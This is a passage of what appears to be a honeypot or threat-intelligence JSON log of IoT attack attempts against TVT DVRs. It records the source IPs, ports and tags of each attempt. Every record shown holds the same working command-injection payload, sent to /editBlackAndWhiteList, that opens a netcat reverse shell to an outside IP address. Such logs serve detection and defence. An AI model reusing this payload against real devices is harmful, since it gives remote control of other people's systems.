- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-18T18:45:48Z",
- "last_seen": "2019-12-18T18:45:48Z"
- },
- {
- "source_ip_address": "5.175.68.66",
- "country": "SK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-18T18:39:13Z",
- "last_seen": "2019-12-18T18:39:13Z"
- },
- {
- "source_ip_address": "93.38.60.162",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-18T18:29:42Z",
- "last_seen": "2019-12-18T18:29:42Z"
- },
- {
- "source_ip_address": "178.129.223.44",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-18T18:17:13Z",
- "last_seen": "2019-12-18T18:17:13Z"
- }
- ]
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement